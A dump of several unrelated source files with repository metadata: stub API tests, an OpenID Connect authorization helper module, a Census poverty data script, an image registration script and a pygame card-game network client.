Get details about given source account. # noqa: E501
"""
pass
def test_get_source_accounts(self):
"""Test case for get_source_accounts
Get list of source accounts # noqa: E501
"""
pass
def test_get_source_accounts_v2(self):
"""Test case for get_source_accounts_v2
Get list of source accounts # noqa: E501
"""
pass
def test_get_source_accounts_v3(self):
"""Test case for get_source_accounts_v3
Get list of source accounts # noqa: E501
"""
pass
def test_list_funding_audit_deltas(self):
"""Test case for list_funding_audit_deltas
Get Funding Audit Delta # noqa: E501
"""
pass
def test_set_notifications_request(self):
"""Test case for set_notifications_request
Set notifications # noqa: E501
"""
pass
def test_transfer_funds(self):
"""Test case for transfer_funds
Transfer Funds between source accounts # noqa: E501
"""
pass
def test_transfer_funds_v3(self):
"""Test case for transfer_funds_v3
Transfer Funds between source accounts # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 53.137255
| 4,651
| 0.719926
|
d9e30b017aaca825ea17e49375143148a2f37711
| 8,660
|
py
|
Python
|
src/oidcendpoint/common/authorization.py
|
anange/oidcendpoint
|
cda647179fbd2fe8d69eb1fddf4b3f6b3ace305c
|
[
"Apache-2.0"
] | null | null | null |
src/oidcendpoint/common/authorization.py
|
anange/oidcendpoint
|
cda647179fbd2fe8d69eb1fddf4b3f6b3ace305c
|
[
"Apache-2.0"
] | null | null | null |
src/oidcendpoint/common/authorization.py
|
anange/oidcendpoint
|
cda647179fbd2fe8d69eb1fddf4b3f6b3ace305c
|
[
"Apache-2.0"
] | null | null | null |
import logging
from urllib.parse import parse_qs
from urllib.parse import splitquery
from urllib.parse import unquote
from urllib.parse import urlencode
from urllib.parse import urlparse
from oidcmsg.exception import ParameterError
from oidcmsg.exception import URIError
from oidcmsg.oauth2 import AuthorizationErrorResponse
from oidcmsg.oidc import AuthorizationResponse
from oidcmsg.oidc import verified_claim_name
from oidcendpoint import sanitize
from oidcendpoint.exception import RedirectURIError
from oidcendpoint.exception import UnknownClient
from oidcendpoint.user_info import SCOPE2CLAIMS
logger = logging.getLogger(__name__)
FORM_POST = """<html>
<head>
<title>Submit This Form</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="{action}">
{inputs}
</form>
</body>
</html>"""
DEFAULT_SCOPES = list(SCOPE2CLAIMS.keys())
_CLAIMS = set()
for scope, claims in SCOPE2CLAIMS.items():
_CLAIMS.update(set(claims))
DEFAULT_CLAIMS = list(_CLAIMS)
def inputs(form_args):
"""
Creates list of input elements
"""
element = []
html_field = '<input type="hidden" name="{}" value="{}"/>'
for name, value in form_args.items():
element.append(html_field.format(name, value))
return "\n".join(element)
def max_age(request):
verified_request = verified_claim_name("request")
return request.get(verified_request, {}).get("max_age") or request.get("max_age", 0)
def verify_uri(endpoint_context, request, uri_type, client_id=None):
"""
A redirect URI
MUST NOT contain a fragment
MAY contain query component
:param endpoint_context: An EndpointContext instance
:param request: The authorization request
:param uri_type: redirect_uri or post_logout_redirect_uri
:return: An error response if the redirect URI is faulty otherwise
None
"""
_cid = request.get("client_id", client_id)
if not _cid:
logger.error("No client id found")
raise UnknownClient("No client_id provided")
_redirect_uri = unquote(request[uri_type])
part = urlparse(_redirect_uri)
if part.fragment:
raise URIError("Contains fragment")
(_base, _query) = splitquery(_redirect_uri)
if _query:
_query = parse_qs(_query)
match = False
# Get the clients registered redirect uris
redirect_uris = endpoint_context.cdb.get(_cid, {}).get("{}s".format(uri_type))
if not redirect_uris:
raise ValueError("No registered {}".format(uri_type))
else:
for regbase, rquery in redirect_uris:
# The URI MUST exactly match one of the Redirection URI
if _base == regbase:
# every registered query component must exist in the uri
if rquery:
if not _query:
raise ValueError("Missing query part")
for key, vals in rquery.items():
if key not in _query:
raise ValueError('"{}" not in query part'.format(key))
for val in vals:
if val not in _query[key]:
raise ValueError(
"{}={} value not in query part".format(key, val)
)
# and vice versa, every query component in the uri
# must be registered
if _query:
if not rquery:
raise ValueError("No registered query part")
for key, vals in _query.items():
if key not in rquery:
raise ValueError('"{}" extra in query part'.format(key))
for val in vals:
if val not in rquery[key]:
raise ValueError(
"Extra {}={} value in query part".format(key, val)
)
match = True
break
if not match:
raise RedirectURIError("Doesn't match any registered uris")
def join_query(base, query):
"""
:param base: URL base
:param query: query part as a dictionary
:return:
"""
if query:
return "{}?{}".format(base, urlencode(query, doseq=True))
else:
return base
def get_uri(endpoint_context, request, uri_type):
""" verify that the redirect URI is reasonable.
:param endpoint_context: An EndpointContext instance
:param request: The Authorization request
:param uri_type: 'redirect_uri' or 'post_logout_redirect_uri'
:return: redirect_uri
"""
uri = ""
if uri_type in request:
verify_uri(endpoint_context, request, uri_type)
uri = request[uri_type]
else:
uris = "{}s".format(uri_type)
client_id = str(request["client_id"])
if client_id in endpoint_context.cdb:
_specs = endpoint_context.cdb[client_id].get(uris)
if not _specs:
raise ParameterError("Missing {} and none registered".format(uri_type))
if len(_specs) > 1:
raise ParameterError(
"Missing {} and more than one registered".format(uri_type)
)
uri = join_query(*_specs[0])
return uri
def authn_args_gather(request, authn_class_ref, cinfo, **kwargs):
"""
Gather information to be used by the authentication method
"""
authn_args = {
"authn_class_ref": authn_class_ref,
"query": request.to_urlencoded(),
"return_uri": request["redirect_uri"],
}
if "req_user" in kwargs:
authn_args["as_user"] = (kwargs["req_user"],)
# Below are OIDC specific. Just ignore if OAuth2
for attr in ["policy_uri", "logo_uri", "tos_uri"]:
if cinfo.get(attr):
authn_args[attr] = cinfo[attr]
for attr in ["ui_locales", "acr_values", "login_hint"]:
if request.get(attr):
authn_args[attr] = request[attr]
return authn_args
def create_authn_response(endpoint, request, sid):
"""
:param endpoint:
:param request:
:param sid:
:return:
"""
# create the response
aresp = AuthorizationResponse()
if request.get("state"):
aresp["state"] = request["state"]
if "response_type" in request and request["response_type"] == ["none"]:
fragment_enc = False
else:
_context = endpoint.endpoint_context
_sinfo = _context.sdb[sid]
if request.get("scope"):
aresp["scope"] = request["scope"]
rtype = set(request["response_type"][:])
handled_response_type = []
fragment_enc = True
if len(rtype) == 1 and "code" in rtype:
fragment_enc = False
if "code" in request["response_type"]:
_code = aresp["code"] = _context.sdb[sid]["code"]
handled_response_type.append("code")
else:
_context.sdb.update(sid, code=None)
_code = None
if "token" in rtype:
_dic = _context.sdb.upgrade_to_token(issue_refresh=False, key=sid)
logger.debug("_dic: %s" % sanitize(_dic))
for key, val in _dic.items():
if key in aresp.parameters() and val is not None:
aresp[key] = val
handled_response_type.append("token")
_access_token = aresp.get("access_token", None)
not_handled = rtype.difference(handled_response_type)
if not_handled:
resp = AuthorizationErrorResponse(
error="invalid_request", error_description="unsupported_response_type"
)
return {"response_args": resp, "fragment_enc": fragment_enc}
return {"response_args": aresp, "fragment_enc": fragment_enc}
class AllowedAlgorithms:
def __init__(self, algorithm_parameters):
self.algorithm_parameters = algorithm_parameters
def __call__(self, client_id, endpoint_context, alg, alg_type):
_cinfo = endpoint_context.cdb[client_id]
_pinfo = endpoint_context.provider_info
_reg, _sup = self.algorithm_parameters[alg_type]
_allowed = _cinfo.get(_reg)
if _allowed is None:
_allowed = _pinfo.get(_sup)
if alg not in _allowed:
logger.error(
"Signing alg user: {} not among allowed: {}".format(alg, _allowed)
)
raise ValueError("Not allowed '%s' algorithm used", alg)
def re_authenticate(request, authn):
return False
| 31.376812
| 88
| 0.604734
|
d0b9be2d3d0024952973555ed95987f009f91952
| 1,794
|
py
|
Python
|
acs5countypoverty.py
|
dannmorr/greater-chicago-food-despository
|
8eb39ce4a4c72fa1c0f47fd81d474cb0727b67c1
|
[
"MIT"
] | null | null | null |
acs5countypoverty.py
|
dannmorr/greater-chicago-food-despository
|
8eb39ce4a4c72fa1c0f47fd81d474cb0727b67c1
|
[
"MIT"
] | null | null | null |
acs5countypoverty.py
|
dannmorr/greater-chicago-food-despository
|
8eb39ce4a4c72fa1c0f47fd81d474cb0727b67c1
|
[
"MIT"
] | null | null | null |
from census_response import getCensusResponse
import json
def main():
#Estimate!!Total!!Population for whom poverty status is determined
pop_table = 'S1701_C01_001E'
#Estimate!!Below poverty level!!Population for whom poverty status is determined
poverty_table = 'S1701_C02_001E'
subject_table = 'https://api.census.gov/data/2018/acs/acs5/subject?'
get_ls = [pop_table, poverty_table]
#county level request for IL (state 17)
geo = 'county:*&in=state:17'
response = getCensusResponse(subject_table, get_ls, geo)
#poverty_data is list of lists, where list elements are rows
#header row: name, population total, population poverty, fip state, fip county
poverty_data = response.json()
#Json format
#{'countyfip': (countyfip = concatenation state and county fip numbers)
#{'metric_one': 1234,
#'metric_two': 5678}}
final_json = {}
for d in poverty_data[1:]:
#set variables to list elements
name, pop_total_str, pop_poverty_str, fip_state, fip_county = d
#convert strings to ints
pop_total_int = int(pop_total_str)
pop_poverty_int = int(pop_poverty_str)
#concat strings
fip_final = fip_state + fip_county
#calculate percent poverty
pct_poverty = pop_poverty_int / pop_total_int * 100
#create county json
county_json = {'name_county':name, 'population_total': pop_total_int, 'population_poverty': pop_poverty_int, 'percent_poverty': pct_poverty}
#set county key to county json value
final_json[fip_final] = county_json
#save file
with open('final_jsons/acs5countypoverty_output.json', 'w') as f:
json.dump(final_json, f)
return final_json
if __name__ == '__main__':
main()
| 34.5
| 148
| 0.687848
|
43c311b98e4c80a56505a12bda7ef80b0f716ed2
| 4,033
|
py
|
Python
|
iter.py
|
miki998/image_registration-maxwell_demons
|
9305ef2c5284231c67c920c8f57e5c5a52fe73f1
|
[
"MIT"
] | null | null | null |
iter.py
|
miki998/image_registration-maxwell_demons
|
9305ef2c5284231c67c920c8f57e5c5a52fe73f1
|
[
"MIT"
] | null | null | null |
iter.py
|
miki998/image_registration-maxwell_demons
|
9305ef2c5284231c67c920c8f57e5c5a52fe73f1
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import scipy
from scipy.interpolate import griddata
from scipy.ndimage import convolve
import cv2
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import numpy as np
import matplotlib as mpl
from scipy.ndimage import gaussian_filter
##################################################
#### Registration of source image, the grey anchor
##################################################
# Build a grid to recover position of each pixel of source image in final registered image
# Be careful : with inversion of A, you also need to invert x and y axis.
xim,yim = np.meshgrid(np.arange(0,nr),np.arange(0,nc))
xim = xim.reshape(1,-1)
yim = yim.reshape(1,-1)
#Coordinates of pixels in source image, corresponding to each point of the grid xim, yim
#######################
####Fill here
#since we have constant magnitude, we simply need to exert the same force
#on all pixels in comparison to these contour
n_iter = 5
tmpIreca = Ireca.copy()
tmpIref = Iref.copy()
for i in range(1,n_iter+1):
print('Iteration number {}'.format(i))
gridRegInv = np.zeros((2,xim.shape[1]))
force = 2
d_fieldx, d_fieldy = comp_forces(tmpIreca[:,cutil][rutil],tmpIref[:,cutil][rutil]
,gIref_x,gIref_y,demons,force,epsilon = 0.001)
break
# regularize deformation field using Gaussian smoothing (but we should keep 0 if there is)
# there shuould be no direction when intensity light is conserved
nonzx = np.nonzero(d_fieldx != 0)
nonzy = np.nonzero(d_fieldy != 0)
maskx = np.zeros(d_fieldx.shape)
masky = np.zeros(d_fieldy.shape)
for x,y in zip(nonzx[0],nonzx[1]): maskx[x,y] = 1
for x,y in zip(nonzy[0],nonzy[1]): masky[x,y] = 1
d_fieldx = gaussian_filter(d_fieldx * maskx,sigma=1)
d_fieldx /= gaussian_filter(maskx, sigma=1)
d_fieldx[np.logical_not(maskx)] = 0
d_fieldy = gaussian_filter(d_fieldy * masky,sigma=1)
d_fieldy /= gaussian_filter(masky, sigma=1)
d_fieldy[np.logical_not(masky)] = 0
print(len(np.nonzero(d_fieldx)[0]))
for idx in range(xim.shape[1]):
x,y = xim[0][idx],yim[0][idx]
gridRegInv[0,idx] = y - d_fieldx[y,x]
gridRegInv[1,idx] = x - d_fieldy[y,x]
##############################
### Build registered image with source pixel associated
Jreg = np.zeros((nr,nc))
for i in range(xim.shape[1]):
value_source = tmpIreca[int(round(gridRegInv[1,i]) + nr), int(round(gridRegInv[0,i]) + nc)]
Jreg[xim[:,i],yim[:,i]] = value_source
img_loss,loss = loss_compute(Jreg,Iref[:,cutil][rutil])
print('This iteration loss: {}'.format(loss))
#######################
# display original images and affine transformation result
######################
plt.figure(figsize=(15,15))
plt.subplot(1,4,1)
plt.imshow(Iref[:,cutil][rutil])
#plt.imshow(Ireca[:,cutil][rutil])
#plt.plot(Preca[0,PtsInd],Preca[1,PtsInd],'-ob',[Preca[0,PtsInd[2]],Preca[0,PtsInd[0]]],[Preca[1,PtsInd[2]],Preca[1,PtsInd[0]]],'-ob')
#plt.plot(Pref[0,PtsInd],Pref[1,PtsInd],'-or',[Pref[0,PtsInd[2]],Pref[0,PtsInd[0]]],[Pref[1,PtsInd[2]],Pref[1,PtsInd[0]]],'-or')
plt.title('Static Image')
plt.subplot(1,4,2)
plt.imshow(Ireca[:,cutil][rutil])
plt.title('Original moving image')
plt.subplot(1,4,3)
#plt.imshow(tmpIref[:,cutil][rutil])
plt.imshow(Jreg)
#plt.plot(Pref[0,PtsInd],Pref[1,PtsInd],'sr','LineWidth',2)
#plt.plot([Xreg1[0],Xreg2[0],Xreg3[0],Xreg1[0]],[Xreg1[1],Xreg2[1],Xreg3[1],Xreg1[1]],'-og','LineWidth',2)
plt.title('After registration');
plt.subplot(1,4,4)
plt.imshow(img_loss)
plt.title('Loss Image');
plt.show()
#update
tmpIreca = np.concatenate((np.concatenate([pad,pad,pad],axis=1),
np.concatenate([pad,Jreg*255,pad],axis=1),
np.concatenate([pad,pad,pad],axis=1)),axis=0)
| 36.333333
| 138
| 0.617902
|
4cad85b0f6a9c67e853a3b7b9ada6288b6d54de1
| 667
|
py
|
Python
|
dune-burgers/pymor-wrapper/python_solve_visualize.py
|
pymor/dune-burgers-demo
|
a9c86c685964b6fe38ce238381afec05b22e057f
|
[
"BSD-2-Clause"
] | null | null | null |
dune-burgers/pymor-wrapper/python_solve_visualize.py
|
pymor/dune-burgers-demo
|
a9c86c685964b6fe38ce238381afec05b22e057f
|
[
"BSD-2-Clause"
] | null | null | null |
dune-burgers/pymor-wrapper/python_solve_visualize.py
|
pymor/dune-burgers-demo
|
a9c86c685964b6fe38ce238381afec05b22e057f
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
from pymor.discretizations.mpi import mpi_wrap_discretization
from pymor.tools import mpi
from pymor.vectorarrays.mpi import MPIVectorArrayAutoComm
from dune_burgers import discretize_dune_burgers
filename = sys.argv[1]
exponent = float(sys.argv[2])
times = map(int, sys.argv[3:])
if mpi.parallel:
d = mpi_wrap_discretization(lambda: discretize_dune_burgers(filename),
use_with=True, with_apply2=False, array_type=MPIVectorArrayAutoComm)
else:
d = discretize_dune_burgers(filename)
U = d.solve(exponent)
U_vis = U.empty()
U_vis.append(U, o_ind=times, remove_from_other=times)
d.visualize(U_vis, filename='out')
| 29
| 100
| 0.76012
|
4e3335bd85fa078bd2ff88fd2666f3ca1b5b18ba
| 14,756
|
py
|
Python
|
DD_client.py
|
hannu-hell/Dashun_Dama-Card-Game
|
293f0742c4c7f808600e7c92964b9d8299d97240
|
[
"MIT"
] | null | null | null |
DD_client.py
|
hannu-hell/Dashun_Dama-Card-Game
|
293f0742c4c7f808600e7c92964b9d8299d97240
|
[
"MIT"
] | null | null | null |
DD_client.py
|
hannu-hell/Dashun_Dama-Card-Game
|
293f0742c4c7f808600e7c92964b9d8299d97240
|
[
"MIT"
] | null | null | null |
from game import *
import os
import socket
import pickle
import threading
# Sets the position of the window to the coordinates
os.environ['SDL_VIDEO_WINDOW_POS'] = '1000,50'
# Game
game = Game()
player1 = None
opponentPlayedCards = []
playerPlayedCards = []
gameOver = False
player2_start_game = False
gamesPlayed = 0
player2wins = 0
def reset_game():
global game, player1, hand, player2_start_game
del hand
del game
game = Game()
player1 = None
player2_start_game = False
playerPlayedCards.clear()
opponentPlayedCards.clear()
def game_logic(p1, p2):
global gameOver, game, player2_start_game, gamesPlayed, player2wins
playerPlayedCards.append(p2.playedCard)
if player2_start_game is False:
if p2.remainingCards != 0:
if p1.playedCard.suit == p2.playedCard.suit:
high_card = game.compare_cards(p1.playedCard, p2.playedCard)
if high_card == p2.playedCard:
for i in playerPlayedCards:
p2.hand.insert(0, i)
for j in opponentPlayedCards:
p2.hand.insert(0, j)
p2.remainingCards = len(p2.hand)
print("-------PLAYER 2 has absorbed the cards-------")
print(f'You: {p2.playedCard}, Opponent: {p1.playedCard}')
playerPlayedCards.clear()
opponentPlayedCards.clear()
else:
p2.won = True
gameOver = True
# Connections
HOST = ""
PORT = 9999
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect((HOST, PORT))
print("Connected to opponent")
hand = pickle.loads(c.recv(4096))
player2 = Player(hand)
player2.turn = False
# Creating Thread
def create_thread(target):
t = threading.Thread(target=target)
t.daemon = True
t.start()
def receiving_data():
global player2, player1, gameOver, hand, player2_start_game, gamesPlayed, player2wins
while True:
data = pickle.loads(c.recv(4096))
if type(data) == list:
gamesPlayed += 1
reset_game()
hand = data
if player2.won:
player2wins += 1
del player2
player2 = Player(hand)
player2.turn = False
else:
del player2
player2 = Player(hand)
player2_start_game = True
player2.turn = True
gameOver = False
else:
player1 = data
if not player1.won:
opponentPlayedCards.append(player1.playedCard)
if player2_start_game:
if player1.remainingCards != 0:
if player2.remainingCards > 0:
if player1.playedCard.suit == player2.playedCard.suit:
high_card = game.compare_cards(player1.playedCard, player2.playedCard)
if high_card == player2.playedCard:
for i in playerPlayedCards:
player2.hand.insert(0, i)
for j in opponentPlayedCards:
player2.hand.insert(0, j)
player2.remainingCards = len(player2.hand)
print("-------PLAYER 2 has absorbed the cards-------")
print(f'You: {player2.playedCard}, Opponent: {player1.playedCard}')
playerPlayedCards.clear()
opponentPlayedCards.clear()
else:
player2.won = True
gameOver = True
else:
gameOver = True
player2.turn = True
else:
gameOver = True
# Graphics
pygame.init()
winWidth = 400
winHeight = 400
cardWidth = 47
cardHeight = 62
playArea = (((winWidth/2)-50), ((winHeight/2)-50), 100, 100)
placeCardLeft = (playArea[0]+2, playArea[1]+50-cardHeight//2)
placeCardRight = (playArea[0]+playArea[3]-2-cardWidth, playArea[1]+50-cardHeight//2)
win = pygame.display.set_mode((winWidth, winHeight))
pygame.display.set_caption("DASHUN_DAMA")
p_last_card = ((winWidth//2-cardWidth//2)-2, (winHeight-cardHeight-50)-2, 50, 65)
o_last_card = ((winWidth//2-cardWidth//2)-2, 48, 50, 65)
o_card_rect = (165, 122, 90, 20)
p_card_rect = (165, 262, 90, 20)
o_card_num_rect = (220, 122, 30, 20)
p_card_num_rect = (220, 262, 30, 20)
p_rect = (220, winHeight-38, 50, 20)
o_rect = (220, 22, 100, 20)
o_set_rect = (20, 20, 120, 170)
p_set_rect = (20, 210, 120, 170)
color = (0, 0, 0)
cards_on_table_rect = (((winWidth/2)+60), ((winHeight/2)-15), 125, 30)
p_games_rect = (((winWidth/2)+60), ((winHeight/2)+20), 125, 30)
p_win_rect = (((winWidth/2)+60), (winHeight-cardHeight-20), 80, 30)
o_win_rect = (((winWidth/2)+60), 80, 80, 30)
def back_fill(rectangle):
pygame.draw.rect(win, color, rectangle)
def draw_layout(surf):
pygame.draw.rect(surf, (255, 0, 0), (10, 10, 380, 380), 2)
pygame.draw.rect(surf, (164, 90, 82), playArea)
back_fill(p_last_card)
back_fill(o_last_card)
if player2.remainingCards != 0:
surf.blit(card_back, ((winWidth//2-cardWidth//2), (winHeight-cardHeight-50)))
if (player1 is None) or (player1.remainingCards != 0):
surf.blit(card_back, ((winWidth//2-cardWidth//2), 50))
back_fill(p_set_rect)
back_fill(o_set_rect)
display_cards_in_hands(surf, player2, player1)
def display_cards_in_hands(surf, p1, p2):
p1_x_spacing, p2_x_spacing = 0, 0
p1_y, p2_y = 300, 40
if 0 < p1.remainingCards <= 10:
for _ in range(p1.remainingCards-1):
surf.blit(card_back, (25+p1_x_spacing, p1_y))
p1_x_spacing += 5
elif 10 < p1.remainingCards <= 20:
for _ in range(10):
surf.blit(card_back, (25+p1_x_spacing, p1_y))
p1_x_spacing += 5
p1_x_spacing = 0
for _ in range(p1.remainingCards-10-1):
surf.blit(card_back, (25+p1_x_spacing, p1_y-10))
p1_x_spacing += 5
elif 20 < p1.remainingCards <= 30:
for _ in range(2):
for _ in range(10):
surf.blit(card_back, (25+p1_x_spacing, p1_y))
p1_x_spacing += 5
p1_x_spacing = 0
p1_y -= 10
for _ in range(p1.remainingCards-20-1):
surf.blit(card_back, (25+p1_x_spacing, p1_y-10))
p1_x_spacing += 5
elif 30 < p1.remainingCards <= 40:
for _ in range(3):
for _ in range(10):
surf.blit(card_back, (25+p1_x_spacing, p1_y))
p1_x_spacing += 5
p1_x_spacing = 0
p1_y -= 10
for _ in range(p1.remainingCards-30-1):
surf.blit(card_back, (25 + p1_x_spacing, p1_y-10))
p1_x_spacing += 5
elif 40 < p1.remainingCards <= 52:
for _ in range(4):
for _ in range(10):
surf.blit(card_back, (25 + p1_x_spacing, p1_y))
p1_x_spacing += 5
p1_x_spacing = 0
p1_y -= 10
for _ in range(p1.remainingCards-40-1):
surf.blit(card_back, (25+p1_x_spacing, p1_y-10))
p1_x_spacing += 5
if p2 is not None:
if 0 < p2.remainingCards <= 10:
for _ in range(p2.remainingCards - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
elif 10 < p2.remainingCards <= 20:
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
for _ in range(p2.remainingCards - 10 - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y+10))
p2_x_spacing += 5
elif 20 < p2.remainingCards <= 30:
for _ in range(2):
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
p2_y += 10
for _ in range(p2.remainingCards - 20 - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y+10))
p2_x_spacing += 5
elif 30 < p2.remainingCards <= 40:
for _ in range(3):
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
p2_y += 10
for _ in range(p2.remainingCards - 30 - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y+10))
p2_x_spacing += 5
elif 40 < p2.remainingCards <= 52:
for _ in range(4):
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
p2_y += 10
for _ in range(p2.remainingCards - 40 - 1):
surf.blit(card_back, (25 + p2_x_spacing, p2_y+10))
p2_x_spacing += 5
else:
for _ in range(2):
for _ in range(10):
surf.blit(card_back, (25 + p2_x_spacing, p2_y))
p2_x_spacing += 5
p2_x_spacing = 0
p2_y += 10
for _ in range(5):
surf.blit(card_back, (25 + p2_x_spacing, p2_y + 10))
p2_x_spacing += 5
def draw_stats(surf):
font = pygame.font.Font(None, 20)
cards = font.render("CARDS: ", 1, (0, 128, 255))
back_fill(o_card_rect)
surf.blit(cards, (170, 125))
back_fill(p_card_rect)
surf.blit(cards, (170, 265))
p_cards = str(player2.remainingCards)
p_r_cards = font.render(p_cards, 1, (255, 255, 255))
back_fill(p_card_num_rect)
surf.blit(p_r_cards, (230, 265))
if player1 is not None:
o_cards = str(player1.remainingCards)
o_r_cards = font.render(o_cards, 1, (255, 255, 255))
back_fill(o_card_num_rect)
surf.blit(o_r_cards, (230, 125))
else:
o_r_cards = font.render("26", 1, (255, 255, 255))
back_fill(o_card_num_rect)
surf.blit(o_r_cards, (230, 125))
you = font.render("YOU", 1, (255, 255, 255))
opponent = font.render("OPPONENT", 1, (255, 255, 255))
back_fill(p_rect)
surf.blit(you, (230, winHeight - 35))
back_fill(o_rect)
surf.blit(opponent, (230, 25))
back_fill(cards_on_table_rect)
c_on_table = font.render("Cards on Table: " + f'{len(playerPlayedCards) + len(opponentPlayedCards)}', 1, (255, 255, 0))
surf.blit(c_on_table, (((winWidth/2) + 62), ((winHeight/2) - 13)))
back_fill(p_games_rect)
p_games = font.render("Games Played: " + f'{gamesPlayed}', 1, (255, 255, 0))
surf.blit(p_games, (((winWidth/2) + 62), ((winHeight/2) + 22)))
back_fill(p_win_rect)
p_wins = font.render("WINS : " + f'{player2wins}', 1, (255, 128, 0))
surf.blit(p_wins, (((winWidth / 2) + 62), (winHeight - cardHeight - 22)))
back_fill(o_win_rect)
o_wins = font.render("WINS : " + f'{gamesPlayed - player2wins}', 1, (255, 128, 0))
surf.blit(o_wins, (((winWidth / 2) + 62), 82))
def draw_player_turn(surf):
if not gameOver:
if player2.turn:
pygame.draw.circle(surf, (255, 0, 0), (winWidth // 2, 30), 10)
pygame.draw.circle(surf, (0, 255, 0), (winWidth // 2, 370), 10)
else:
pygame.draw.circle(surf, (0, 255, 0), (winWidth // 2, 30), 10)
pygame.draw.circle(surf, (255, 0, 0), (winWidth // 2, 370), 10)
else:
pygame.draw.circle(surf, (255, 0, 0), (winWidth // 2, 30), 10)
pygame.draw.circle(surf, (255, 0, 0), (winWidth // 2, 370), 10)
def you_won(surf):
font = pygame.font.Font(None, 24)
font_cont = pygame.font.Font(None, 15)
pygame.draw.rect(surf, (0, 0, 0), playArea)
won = font.render("YOU WON !", 1, (255, 128, 0))
cont1 = font_cont.render("Wait for opponent", 1, (0, 255, 0))
cont2 = font_cont.render("to play again", 1, (0, 255, 0))
surf.blit(won, (((winWidth / 2) - 45), ((winHeight / 2)-10)))
surf.blit(cont1, (((winWidth / 2) - 45), ((winHeight / 2)+20)))
surf.blit(cont2, (((winWidth / 2) - 35), ((winHeight / 2)+35)))
def you_lost(surf):
font = pygame.font.Font(None, 24)
font_cont = pygame.font.Font(None, 15)
pygame.draw.rect(surf, (0, 0, 0), playArea)
lost = font.render("YOU LOST !", 1, (255, 128, 0))
cont1 = font_cont.render("Wait for opponent", 1, (0, 255, 0))
cont2 = font_cont.render("to play again", 1, (0, 255, 0))
surf.blit(lost, (((winWidth / 2) - 45), ((winHeight / 2)-10)))
surf.blit(cont1, (((winWidth / 2) - 45), ((winHeight / 2)+20)))
surf.blit(cont2, (((winWidth / 2) - 35), ((winHeight / 2)+35)))
def play_area_update(surf):
pygame.draw.rect(surf, (164, 90, 82), playArea)
if not gameOver:
if player2_start_game is False:
if len(playerPlayedCards) != 0 and not player2.turn:
match_cards(surf, playerPlayedCards[-1], placeCardRight[0], placeCardRight[1])
if len(opponentPlayedCards) != 0:
match_cards(surf, opponentPlayedCards[-1], placeCardLeft[0], placeCardLeft[1])
else:
if len(playerPlayedCards) != 0:
match_cards(surf, playerPlayedCards[-1], placeCardRight[0], placeCardRight[1])
if len(opponentPlayedCards) != 0 and player2.turn:
match_cards(surf, opponentPlayedCards[-1], placeCardLeft[0], placeCardLeft[1])
else:
if player2.won:
you_won(surf)
else:
you_lost(surf)
def window_update():
draw_layout(win)
draw_player_turn(win)
play_area_update(win)
draw_stats(win)
pygame.display.update()
create_thread(receiving_data)
run = True
while run:
for event in pygame.event.get():
if event.type == pygame.QUIT:
c.close()
run = False
if event.type == pygame.MOUSEBUTTONDOWN and player2.turn and not gameOver:
if pygame.mouse.get_pressed()[0]:
if (winWidth//2 - cardWidth//2) <= pygame.mouse.get_pos()[0] <= (winWidth//2 + cardWidth//2):
if (winHeight-cardHeight-50) <= pygame.mouse.get_pos()[1] <= (winHeight-50):
player2.playedCard = player2.hand.pop()
player2.remainingCards -= 1
c.send(pickle.dumps(player2))
game_logic(player1, player2)
player2.turn = False
window_update()
| 36.982456
| 123
| 0.556113
|
740edacb746309a61143fdf6dc1773dc3f1f4d5e
| 1,169
|
py
|
Python
|
src/pyrin/admin/decorators.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
src/pyrin/admin/decorators.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
src/pyrin/admin/decorators.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
admin decorators module.
"""
import pyrin.admin.services as admin_services
def admin(*args, **kwargs):
"""
decorator to register an admin page.
:param object args: admin class constructor arguments.
:param object kwargs: admin class constructor keyword arguments.
:keyword bool replace: specifies that if there is another registered
admin page with the same register name or the same entity,
replace it with the new one, otherwise raise
an error. defaults to False.
:raises InvalidAdminPageTypeError: invalid admin page type error.
:raises DuplicatedAdminPageError: duplicated admin page error.
:returns: admin class.
:rtype: type
"""
def decorator(cls):
"""
decorates the given class and registers an instance
of it into available admin pages.
:param type cls: admin class.
:returns: admin class.
:rtype: type
"""
instance = cls(*args, **kwargs)
admin_services.register(instance, **kwargs)
return cls
return decorator
| 25.977778
| 85
| 0.625321
|
6664a3b8e3f17a29cd59bcf4330e139913323c01
| 7,029
|
py
|
Python
|
examples/icme2017/evaluation/yael_v438/doc/conf-old.py
|
htyao89/ICME2017
|
bc302f7972a0791c6042a9c43bc3fe4c4fb13282
|
[
"BSD-2-Clause"
] | 4
|
2019-01-07T17:39:53.000Z
|
2020-02-26T03:20:18.000Z
|
MotionAnalysis/SVM_model/function/yael_v438/doc/conf-old.py
|
BumbleBee0819/Estimating_mechanical_properties_of_cloth
|
547bba3544bd686a7bac39c9985d89fcdf171642
|
[
"MIT"
] | 1
|
2020-09-24T07:42:13.000Z
|
2020-09-24T07:42:13.000Z
|
examples/icme2017/evaluation/yael_v438/doc/conf-old.py
|
htyao89/ICME2017
|
bc302f7972a0791c6042a9c43bc3fe4c4fb13282
|
[
"BSD-2-Clause"
] | 2
|
2019-08-12T20:49:39.000Z
|
